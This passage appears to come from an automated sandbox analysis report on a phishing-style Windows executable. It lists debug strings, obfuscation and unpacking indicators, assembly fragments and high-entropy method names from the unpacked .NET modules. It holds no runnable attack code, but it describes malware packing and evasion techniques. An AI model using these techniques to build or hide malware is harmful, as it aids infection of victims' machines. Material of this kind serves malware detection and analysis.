                Source: Binary string: Microsoft.VisualBasic.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb0 source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.pdbH source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Accessibility.pdbH source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: replace.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483046509.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000003.1422664524.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683034246.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: replace.pdbGCTL source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483046509.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000003.1422664524.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683034246.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3681295936.000000000081E000.00000002.00000001.01000000.0000000D.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3676563053.000000000081E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: System.Drawing.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Nfo.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.pdb4 source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.pdb, source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, unTi9rbmXOPJ0aSMYW.cs.Net Code: VO7Q89x6k8 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, unTi9rbmXOPJ0aSMYW.cs.Net Code: VO7Q89x6k8 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, unTi9rbmXOPJ0aSMYW.cs.Net Code: VO7Q89x6k8 System.Reflection.Assembly.Load(byte[])
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: 0xDA0E7A2E [Wed Dec 5 09:11:10 2085 UTC]
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_07869418 push esp; iretd 0_2_0786944D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_0786944F push esp; iretd 0_2_0786944D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_07869BB0 push 0000005Dh; ret 0_2_07869BE1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_07869BE8 push 0000005Dh; ret 0_2_07869BE1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 0_2_078D3E3A push ds; ret 0_2_078D3E3B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0041E073 push ebx; ret 4_2_0041E074
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00416023 push ds; ret 4_2_00416071
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00404834 push ebx; ret 4_2_00404835
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004119A0 pushfd ; iretd 4_2_004119B2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0040D276 push ebx; retf 4_2_0040D29A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0040D214 push ecx; iretd 4_2_0040D215
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00418B17 push ss; retf 4_2_00418B1B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004074E7 pushad ; iretd 4_2_004074F3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00403490 push eax; ret 4_2_00403492
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0041E4A3 push edx; ret 4_2_0041E4A4
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00406524 push es; iretd 4_2_00406530
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_004145D8 pushfd ; ret 4_2_004145D9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_0040CE54 push cs; iretd 4_2_0040CE5B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EA225F pushad ; ret 4_2_00EA27F9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EA27FA pushad ; ret 4_2_00EA27F9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EA283D push eax; iretd 4_2_00EA2858
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED09AD push ecx; mov dword ptr [esp], ecx4_2_00ED09B6
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EAB008 push es; iretd 4_2_00EAB009
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EA9939 push es; iretd 4_2_00EA9940
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032909AD push ecx; mov dword ptr [esp], ecx21_2_032909B6
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0294231D push edi; retf 21_2_02942328
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_02934054 pushad ; iretd 21_2_02934060
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0293E50D pushfd ; iretd 21_2_0293E51F
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_02942B90 push ds; ret 21_2_02942BDE
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0294ABE0 push ebx; ret 21_2_0294ABE1
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_029313A1 push ebx; ret 21_2_029313A2
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: section name: .text entropy: 7.955766745209155
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, EDrkqNNTCIkioPtkJC.csHigh entropy of concatenated method names: 'OMHVnZWR1S', 'K80VtOO4dp', 'ToString', 'rROVovp87A', 'M3gVCg4VIk', 'oqtV3cfe3l', 'j1bVuEP3Ev', 'U3CVqJD22i', 'BTSVxNYeGP', 'zc5VjmQs34'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, YtKP9Dn60ooNnCBsss.csHigh entropy of concatenated method names: 'Pe0XOKeLUx', 'G0FXvTtA8b', 'jljXll2lEQ', 'nAGXPsD4mk', 'pGsXeN2RGg', 'yIfXSBCatb', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, xMo56NKL8WOxyGtrG1.csHigh entropy of concatenated method names: 'AD2u1owiCN', 'oryuK5eBn3', 'CQx3lnZOoo', 'PIb3Pd7NRB', 'Uyu3SokFeP', 'FyO30Rr1WB', 'Ovu32UkK5p', 'W3R3bDgT26', 'RJI3h5J2vf', 'mx33TL6udv'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, exLKbyYZ3XkQF9bSTH.csHigh entropy of concatenated method names: 'OH2qfkAW97', 'wCIqCetSiA', 'twKquAs1Fc', 'NbmqxiV6fn', 'DWOqjSPN8h', 'Fv3uiM7t21', 'BYpuJMhRBp', 'uWbuZ4h8YW', 'SuLuMORVL7', 'aBFuy7ZYDV'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, KomQtPcjenOwFmOdORq.csHigh entropy of concatenated method names: 'MaMI7Jc3RB', 'f8JIarA5kK', 'w5DI8o5k6t', 'MbdIYXGZZb', 'sPfI1NtLxq', 'aC7IcDFeNv', 'dNgIKqvkfv', 'hmGIrlRVxH', 'dAqIAQXNGo', 'xRuIW8cbfj'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, PoZbtMzHuOKInXqKNJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HblILOvFy1', 'uRSIgD6eIG', 'RYXIs2X8QJ', 'lSnIVoPMN0', 'Lg1IXdc3XF', 'gaZIITkUOG', 'Aa4Ik6thwN'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, qno1tymxYbO2r3sJNf.csHigh entropy of concatenated method names: 'HS8LrtgJNV', 'dnsLA39Vdq', 't8aLOHQLfZ', 'K7ALvbvPjm', 'PvJLPIkDOC', 'moRLSf2eNh', 'zHrL2bZIBs', 'CMRLbKYVYk', 'ky5LTKG0us', 'FWSLEDC2wG'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, rTa5imCWqdkmB6wjPk.csHigh entropy of concatenated method names: 'pbj3Y4Sq2i', 'Q5t3cC7Ntq', 'ep63rE5Yk8', 'ovb3AS1Erb', 'euU3gWVxpA', 'soG3sJpyt6', 'RyP3VcoUZF', 'COO3XsoKpj', 'g2l3I6731k', 'S2Q3kJCMIs'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, iX3jYo5b7XNiZZXSAR.csHigh entropy of concatenated method names: 'JRmxojFg2Z', 'WF7x3AMxmj', 'BqvxqWvwGm', 'ETHq4JC62d', 'c8Lqzp4Gg6', 'ColxDZlXGX', 'i68xFeZgwa', 'I5KxRFjvlB', 'Nidxm7oRcb', 'gYkxQnvlBs'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, unTi9rbmXOPJ0aSMYW.csHigh entropy of concatenated method names: 'PnTmfTxi37', 'cWvmoYGZrC', 'qu2mCk9yuL', 'QJGm3wqqEd', 'Pfmmuq6Pb3', 'mcemqimGkC', 'RLMmxKeMCp', 'myRmjTT7HL', 'uiHmUpAkdm', 'LFomn0gM2O'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, PdEGCJtnrBHUYbRdcG.csHigh entropy of concatenated method names: 'k3kIFsSjLx', 'Y0UImelAPw', 'bkSIQh99L0', 'VwlIo12Z4G', 't1YICY966D', 'sEpIurSxM1', 'P0gIqAiuPN', 'pHEXZJbbRt', 'mfDXMFI8JM', 'gr2Xy1r4pA'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, Yrda3ChKFSZWpRxAwg.csHigh entropy of concatenated method names: 'Dispose', 'BLWFy2PWaL', 'zIPRvQctg9', 'CtuddYFjoj', 'ilLF4oe9nM', 'DaDFzs29Uy', 'ProcessDialogKey', 'X4gRDx8Li6', 'uHsRFhIsr6', 'wS7RR43JaG'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, Ivt4puv4yAdMYHAvAY.csHigh entropy of concatenated method names: 'xqN8lP4Tf', 'HgMYaoHtB', 'klUcpZY8r', 'HRgKrb5jt', 'cQiAk0ATO', 'oEmWXqTQq', 'TSDIiwdgxKQd3Sai2p', 'ByTR1snVkJiK2hFDAw', 'fPqXXpKLV', 'uHJkPVNVH'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, FaFgKZZc7bmGVoispx.csHigh entropy of concatenated method names: 'bhlx7tgUob', 'z8Vxakd8lk', 'glQx8WO9AT', 'Pt0xYQqyEA', 'hbBx1tycVy', 'j1qxcvyitb', 'YZ8xKH2jDf', 'mobxr5pD6D', 'A4sxAvq28c', 'pbRxW8iCwp'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, QIxXUl9ykF6i6XwVuL.csHigh entropy of concatenated method names: 'jqLCedqrih', 'ibmCNJKuYu', 'YX2CpuSLT3', 'rhVCH1Ohp2', 'gpeCiKVIH2', 'G5XCJgfYAI', 'hLYCZ35mu6', 'iAXCMHkOt7', 'PW3CyIYgr9', 'OuuC4HE2e9'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, o4iFd1ygcCAYmOMS3r.csHigh entropy of concatenated method names: 'mbcXo5M08d', 'JW7XCdES4B', 'OlJX3q2Sq6', 'uoVXuEPyfB', 'GscXq4igWE', 'q9LXx3QQ9g', 'BVRXjltAa6', 'slAXUmGgwc', 'wuRXn4lDdt', 'lXhXtb7iWE'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, T1khdSprDUSyNMMGSX.csHigh entropy of concatenated method names: 'tXUFxsmw3H', 'S1xFjZkZmt', 'U36Fnpe9Ls', 'HXYFtJN2bk', 'lTZFgD5DoU', 'G78Fs3AWSE', 'bVyGHGcCqeKaSYos2B', 'Hsy9ZhgmNdOsrEb0E4', 'gGuFFWjcjm', 'pipFmxHU1K'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, tk95CgwBg05oKY2LBo.csHigh entropy of concatenated method names: 'ToString', 'iMAsEuxFJN', 'chDsvV26wA', 'DC2slRm4tg', 'cK4sPevSS6', 'jDlsSOiLXX', 'hNss0pa22v', 'bgJs2JtahX', 'QWEsbaZ4nh', 'GKjshyhNIK'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, nHy93WWjIw9E7ltEHb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wsLRyFOsvg', 'RfwR4hYcJq', 'LcVRzJPL0V', 'CcqmDiRaII', 'LQlmFyZkOu', 'MY2mRIFwho', 'JqMmmWGFON', 'l1qWX27MkCXHZRVp7KZ'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, e4YOeKc1sS6G73rwxfw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'k0WkefeNxS', 'edvkNsse8p', 'gFJkpQ238o', 'TkJkHkwQ1T', 'MSSkivIK7A', 'CEkkJWiWoW', 'YrJkZdlnVx'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, EDrkqNNTCIkioPtkJC.csHigh entropy of concatenated method names: 'OMHVnZWR1S', 'K80VtOO4dp', 'ToString', 'rROVovp87A', 'M3gVCg4VIk', 'oqtV3cfe3l', 'j1bVuEP3Ev', 'U3CVqJD22i', 'BTSVxNYeGP', 'zc5VjmQs34'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, YtKP9Dn60ooNnCBsss.csHigh entropy of concatenated method names: 'Pe0XOKeLUx', 'G0FXvTtA8b', 'jljXll2lEQ', 'nAGXPsD4mk', 'pGsXeN2RGg', 'yIfXSBCatb', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, xMo56NKL8WOxyGtrG1.csHigh entropy of concatenated method names: 'AD2u1owiCN', 'oryuK5eBn3', 'CQx3lnZOoo', 'PIb3Pd7NRB', 'Uyu3SokFeP', 'FyO30Rr1WB', 'Ovu32UkK5p', 'W3R3bDgT26', 'RJI3h5J2vf', 'mx33TL6udv'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, exLKbyYZ3XkQF9bSTH.csHigh entropy of concatenated method names: 'OH2qfkAW97', 'wCIqCetSiA', 'twKquAs1Fc', 'NbmqxiV6fn', 'DWOqjSPN8h', 'Fv3uiM7t21', 'BYpuJMhRBp', 'uWbuZ4h8YW', 'SuLuMORVL7', 'aBFuy7ZYDV'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, KomQtPcjenOwFmOdORq.csHigh entropy of concatenated method names: 'MaMI7Jc3RB', 'f8JIarA5kK', 'w5DI8o5k6t', 'MbdIYXGZZb', 'sPfI1NtLxq', 'aC7IcDFeNv', 'dNgIKqvkfv', 'hmGIrlRVxH', 'dAqIAQXNGo', 'xRuIW8cbfj'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, PoZbtMzHuOKInXqKNJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HblILOvFy1', 'uRSIgD6eIG', 'RYXIs2X8QJ', 'lSnIVoPMN0', 'Lg1IXdc3XF', 'gaZIITkUOG', 'Aa4Ik6thwN'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, qno1tymxYbO2r3sJNf.csHigh entropy of concatenated method names: 'HS8LrtgJNV', 'dnsLA39Vdq', 't8aLOHQLfZ', 'K7ALvbvPjm', 'PvJLPIkDOC', 'moRLSf2eNh', 'zHrL2bZIBs', 'CMRLbKYVYk', 'ky5LTKG0us', 'FWSLEDC2wG'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, rTa5imCWqdkmB6wjPk.csHigh entropy of concatenated method names: 'pbj3Y4Sq2i', 'Q5t3cC7Ntq', 'ep63rE5Yk8', 'ovb3AS1Erb', 'euU3gWVxpA', 'soG3sJpyt6', 'RyP3VcoUZF', 'COO3XsoKpj', 'g2l3I6731k', 'S2Q3kJCMIs'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, iX3jYo5b7XNiZZXSAR.csHigh entropy of concatenated method names: 'JRmxojFg2Z', 'WF7x3AMxmj', 'BqvxqWvwGm', 'ETHq4JC62d', 'c8Lqzp4Gg6', 'ColxDZlXGX', 'i68xFeZgwa', 'I5KxRFjvlB', 'Nidxm7oRcb', 'gYkxQnvlBs'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, unTi9rbmXOPJ0aSMYW.csHigh entropy of concatenated method names: 'PnTmfTxi37', 'cWvmoYGZrC', 'qu2mCk9yuL', 'QJGm3wqqEd', 'Pfmmuq6Pb3', 'mcemqimGkC', 'RLMmxKeMCp', 'myRmjTT7HL', 'uiHmUpAkdm', 'LFomn0gM2O'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, PdEGCJtnrBHUYbRdcG.csHigh entropy of concatenated method names: 'k3kIFsSjLx', 'Y0UImelAPw', 'bkSIQh99L0', 'VwlIo12Z4G', 't1YICY966D', 'sEpIurSxM1', 'P0gIqAiuPN', 'pHEXZJbbRt', 'mfDXMFI8JM', 'gr2Xy1r4pA'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, Yrda3ChKFSZWpRxAwg.csHigh entropy of concatenated method names: 'Dispose', 'BLWFy2PWaL', 'zIPRvQctg9', 'CtuddYFjoj', 'ilLF4oe9nM', 'DaDFzs29Uy', 'ProcessDialogKey', 'X4gRDx8Li6', 'uHsRFhIsr6', 'wS7RR43JaG'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, Ivt4puv4yAdMYHAvAY.csHigh entropy of concatenated method names: 'xqN8lP4Tf', 'HgMYaoHtB', 'klUcpZY8r', 'HRgKrb5jt', 'cQiAk0ATO', 'oEmWXqTQq', 'TSDIiwdgxKQd3Sai2p', 'ByTR1snVkJiK2hFDAw', 'fPqXXpKLV', 'uHJkPVNVH'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, FaFgKZZc7bmGVoispx.csHigh entropy of concatenated method names: 'bhlx7tgUob', 'z8Vxakd8lk', 'glQx8WO9AT', 'Pt0xYQqyEA', 'hbBx1tycVy', 'j1qxcvyitb', 'YZ8xKH2jDf', 'mobxr5pD6D', 'A4sxAvq28c', 'pbRxW8iCwp'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, QIxXUl9ykF6i6XwVuL.csHigh entropy of concatenated method names: 'jqLCedqrih', 'ibmCNJKuYu', 'YX2CpuSLT3', 'rhVCH1Ohp2', 'gpeCiKVIH2', 'G5XCJgfYAI', 'hLYCZ35mu6', 'iAXCMHkOt7', 'PW3CyIYgr9', 'OuuC4HE2e9'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, o4iFd1ygcCAYmOMS3r.csHigh entropy of concatenated method names: 'mbcXo5M08d', 'JW7XCdES4B', 'OlJX3q2Sq6', 'uoVXuEPyfB', 'GscXq4igWE', 'q9LXx3QQ9g', 'BVRXjltAa6', 'slAXUmGgwc', 'wuRXn4lDdt', 'lXhXtb7iWE'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, T1khdSprDUSyNMMGSX.csHigh entropy of concatenated method names: 'tXUFxsmw3H', 'S1xFjZkZmt', 'U36Fnpe9Ls', 'HXYFtJN2bk', 'lTZFgD5DoU', 'G78Fs3AWSE', 'bVyGHGcCqeKaSYos2B', 'Hsy9ZhgmNdOsrEb0E4', 'gGuFFWjcjm', 'pipFmxHU1K'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, tk95CgwBg05oKY2LBo.csHigh entropy of concatenated method names: 'ToString', 'iMAsEuxFJN', 'chDsvV26wA', 'DC2slRm4tg', 'cK4sPevSS6', 'jDlsSOiLXX', 'hNss0pa22v', 'bgJs2JtahX', 'QWEsbaZ4nh', 'GKjshyhNIK'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, nHy93WWjIw9E7ltEHb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wsLRyFOsvg', 'RfwR4hYcJq', 'LcVRzJPL0V', 'CcqmDiRaII', 'LQlmFyZkOu', 'MY2mRIFwho', 'JqMmmWGFON', 'l1qWX27MkCXHZRVp7KZ'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, e4YOeKc1sS6G73rwxfw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'k0WkefeNxS', 'edvkNsse8p', 'gFJkpQ238o', 'TkJkHkwQ1T', 'MSSkivIK7A', 'CEkkJWiWoW', 'YrJkZdlnVx'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, EDrkqNNTCIkioPtkJC.csHigh entropy of concatenated method names: 'OMHVnZWR1S', 'K80VtOO4dp', 'ToString', 'rROVovp87A', 'M3gVCg4VIk', 'oqtV3cfe3l', 'j1bVuEP3Ev', 'U3CVqJD22i', 'BTSVxNYeGP', 'zc5VjmQs34'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, YtKP9Dn60ooNnCBsss.csHigh entropy of concatenated method names: 'Pe0XOKeLUx', 'G0FXvTtA8b', 'jljXll2lEQ', 'nAGXPsD4mk', 'pGsXeN2RGg', 'yIfXSBCatb', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, xMo56NKL8WOxyGtrG1.csHigh entropy of concatenated method names: 'AD2u1owiCN', 'oryuK5eBn3', 'CQx3lnZOoo', 'PIb3Pd7NRB', 'Uyu3SokFeP', 'FyO30Rr1WB', 'Ovu32UkK5p', 'W3R3bDgT26', 'RJI3h5J2vf', 'mx33TL6udv'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, exLKbyYZ3XkQF9bSTH.csHigh entropy of concatenated method names: 'OH2qfkAW97', 'wCIqCetSiA', 'twKquAs1Fc', 'NbmqxiV6fn', 'DWOqjSPN8h', 'Fv3uiM7t21', 'BYpuJMhRBp', 'uWbuZ4h8YW', 'SuLuMORVL7', 'aBFuy7ZYDV'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, KomQtPcjenOwFmOdORq.csHigh entropy of concatenated method names: 'MaMI7Jc3RB', 'f8JIarA5kK', 'w5DI8o5k6t', 'MbdIYXGZZb', 'sPfI1NtLxq', 'aC7IcDFeNv', 'dNgIKqvkfv', 'hmGIrlRVxH', 'dAqIAQXNGo', 'xRuIW8cbfj'
